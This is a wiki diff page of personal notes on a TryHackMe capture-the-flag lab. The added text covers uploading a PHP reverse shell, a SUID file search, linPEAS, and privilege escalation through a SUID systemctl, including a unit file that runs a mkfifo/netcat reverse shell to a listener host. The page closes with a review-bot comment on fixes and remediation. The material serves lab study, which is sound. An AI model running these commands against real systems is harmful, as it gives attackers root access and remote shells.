The gMan nixWiki

Because the mind is made of Teflon...

prac_app_tryhackme

Differences

prac_app_tryhackme [2022/09/24 18:32] gman  ->  prac_app_tryhackme [2022/09/24 19:03] (current) gman
Line 44: Line 44:
   * I did that... and it didn't work.   * I did that... and it didn't work.
  
 +===== Reverse Shell =====
  
 +Obtain an exploit reverse shell to upload: [[https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php | pentestmonkey]]
 +
 +  * You have to rename it .phtml to upload it.
 +  * Upload it.
 +  * Start a listener on your attack machine:
 +
 +<code>
 +nc -lvnp 1234
 +
 +# -l listener
 +# -v verbose
 +# -n numeric-only IPs, no DNS
 +# -p port (local port number)
 +</code> 
 +
 +  * Then execute the .phtml file on the target machine: 
 +
 +<code>http:[IP]:3333/internal/uploads</code>
 +
 +===== Privilege Escalation =====
 +
 +[[https://n0w4n.nl/vulnversity/ | n0w4n]]: For a lot of CTFs, a good find are files with the SUID bit set.
 +
 +<code>
 +find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
 +
 +# -l long listing format
 +# -d list directory names, not contents
 +</code>
 +
 +**Or use PEASS:** [[https://pentesttools.net/peass-privilege-escalation-awesome-scripts-suite/ | Privilege]]Escalation Awesom Scripts Suite
 +  * [[https://github.com/carlospolop/PEASS-ng/releases/tag/20220918 | Download]]
 +  * [[https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS | Linpeas]]:  Linux local Privilege Escalation Awesome Script (.sh)
 +
 +**Discovered Vulnerability:** [[https://gtfobins.github.io/gtfobins/systemctl/ | systemctl is SUID root]]
 +
 +===== Exploit =====
 +
 +[[https://n0w4n.nl/vulnversity/ | n0w4n]]: He said we did not have perms to write in the default systemctl dir, so he created the unit file as an ENVIRONMENT VARIABLE.
 +
 +  * First we create a variable which holds a unique file (on target machine). 
 +
 +<code>eop=$(mktemp).service</code>
 +
 +  * Then we create an unit file and write it into the variable. Inside the unit file we enter a command that will let the shell execute the command ''cat'' and redirect the output of ''cat'' to a file called ''output'' in the folder ''/tmp/''.
 +
 +<code>
 +echo '[Service]
 +> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
 +> [Install]
 +> WantedBy=multi-user.target' > $eop
 +</code>
 +
 +  * And finally we use the /bin/systemctl program to enable the unit file.
 +
 +<code>
 +/bin/systemctl link $eop
 +# Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
 +
 +/bin/systemctl enable --now $eop
 +# Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
 +</code>
 +
 +  * Find it:
 +
 +<code>ls -lah /tmp</code>
 +
 +===== Alternative Exploit =====
 +
 +**To get a reverse root shell:**
 +
 +**NOTE:** the target machine is using netcat OpenBSD, NOT the traditional netcat. That means the -e (execute) flag will not work. See **Netcat (Traditional)** and **Netcat (OpenBSD)" (OpenBSD netcat removed the -e flag “for security” ([[https://kb.systemoverlord.com/security/postex/reverse/ | link]]).
 +
 +<code>
 +# nc (openbsd):
 +rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f
 +</code>
 +
 +  * Create your unit file:
 +
 +<code>
 +echo '[Service]
 +Type=oneshot
 +ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f"
 +[Install]
 +WantedBy=multi-user.target' > gk.service
 +</code>
 +
 +  * Open a listener on your attack machine:
 +
 +<code>nc -lvnp 7777</code>
 +
 +  * Link and start the service:
 +
 +<code>
 +/bin/systemctl link /tmp/gk.service         # need the full path
 +/bin/systemctl enable --now /tmp/gk.service
 +</code>
 +
 +Done.
 +
 +----
  
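Review bot: the Privilege Escalation section (the **Discovered Vulnerability** line) states that systemctl is SUID root but records neither the evidence nor the fix; add the `ls -ld` entry for /bin/systemctl from the find output above it, and a remediation line noting that systemctl is never meant to carry the SUID bit, so `chmod u-s /bin/systemctl` closes the hole and a SUID systemctl in that find listing is a misconfiguration worth alerting on. Smaller points in the same hunk: the upload URL `http:[IP]:3333/internal/uploads` is missing the `//` after `http:`; `Awesom` should read `Awesome`, and the link text `[[... | Privilege]]Escalation Awesom Scripts Suite` splits the suite's name across the link boundary; the `"` closing **Netcat (OpenBSD)** should be `**`; and because both unit files are written inside single quotes, `$HOST` and `$PORT` land in the file literally, so the text should say they are placeholders to be replaced before the `echo` is run.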
prac_app_tryhackme.1664044344.txt.gz · Last modified: by gman